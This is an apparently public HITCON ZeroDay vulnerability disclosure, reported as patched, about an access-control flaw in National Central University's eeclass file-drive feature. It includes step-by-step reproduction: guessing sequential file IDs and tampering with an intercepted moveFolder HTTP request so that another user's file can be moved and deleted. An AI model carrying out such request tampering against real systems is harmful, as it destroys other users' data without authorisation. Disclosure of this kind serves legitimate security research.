中央大學eeclass系統broken access control

Vulnerability Overview

ZDID: ZD-2021-00329
發信 Vendor: 國立中央大學
Title: 中央大學eeclass系統broken access control
Introduction: broken access control

處理狀態

目前狀態

公開

Last Update : 2021/06/30

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2021/06/18 16:12:05 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
2021/06/18 16:17:13 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
2021/06/18 16:23:19 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
2021/06/18 16:28:23 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
2021/06/19 00:40:15 : 新提交 (由 wqwfeoipwqjfpwiejfdpioqweoifjqwf 更新此狀態)
2021/06/20 23:26:34 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/06/21 12:05:15 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/06/21 12:05:15 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/06/21 12:05:15 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/06/22 11:57:27 : 已修補 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/06/30 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2021-00329
通報者：lebr0n_li (wqwfeoipwqjfpwiejfdpioqweoifjqwf)
風險：中
類型：存取控制缺陷 (Broken Access Control)

參考資料

攻擊者可經由該漏洞取得、修改、刪除系統中的其他使用者的資料，或連線至高權限使用者的頁面。

OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

一開始只是亂試參數，但沒想到自己的檔案就這麼消失了...
為了追回我不見的檔案，所以發現了這個會使自己檔案消失的漏洞
同理，也可利用此漏洞進行攻擊

此漏洞可刪除所有使用者用drive功能儲存下來的檔案（雖然應該沒什麼人在用這個功能），危害相當嚴重，建議立即修補！
以下是復現過程（這裡以朋友帳號來測試），：

確認target id(真實情況可以用for loop去炸就行了)

帳號一先創造一個名為check id的folder，能拿到一個id（此處的id是2086），下一個創造或上傳的檔案的id即為此id+1

nyancat.svg的id就是2087（2086+1）

得到attacker id

帳號二創造attacker資料夾，並記下folder id（此處為2088）

攻擊

帳號二上傳任意檔案(id:2089)，選擇檔案移動的功能，並在2089移動至attacker資料夾時，攔截request並修改

Original:

POST /archive/?type=moveFolder&ids%5B0%5D=2089&parentId=0&_lock=type%2Cids%2CparentId&ajaxAuth=**REDACTED** HTTP/1.1
Host: ncueeclass.ncu.edu.tw
Connection: close
Content-Length: 102
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://ncueeclass.ncu.edu.tw
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ncueeclass.ncu.edu.tw/archive
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,ko;q=0.6,zh-CN;q=0.5
Cookie: **REDACTED**

_fmSubmit=yes&formVer=3.0&formId=radio-tree-form&folderId=2088&csrf-t=**REDACTED**

Edited（2089改成2087，移動2089，變成移動2087，也就是帳號一的nyancat）:

POST /archive/?type=moveFolder&ids%5B0%5D=2087&parentId=0&_lock=type%2Cids%2CparentId&ajaxAuth=**REDACTED** HTTP/1.1
Host: ncueeclass.ncu.edu.tw
Connection: close
Content-Length: 102
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://ncueeclass.ncu.edu.tw
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://ncueeclass.ncu.edu.tw/archive
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7,ko;q=0.6,zh-CN;q=0.5
Cookie: **REDACTED**

_fmSubmit=yes&formVer=3.0&formId=radio-tree-form&folderId=2088&csrf-t=**REDACTED**

修改request後，就能將nyancat.svg(2087)移動到attacker檔案夾(2088)

此時帳號一檔案消失，雖然無法看到被移動走的檔案，但已上傳檔案數不為0，代表此時檔案尚未被刪除

此時帳號二雖然無法看到移動過來的檔案（file size不為0，但檔案數為0）

但若將attacker這個資料夾刪除，帳號一的檔案也會被同樣被刪除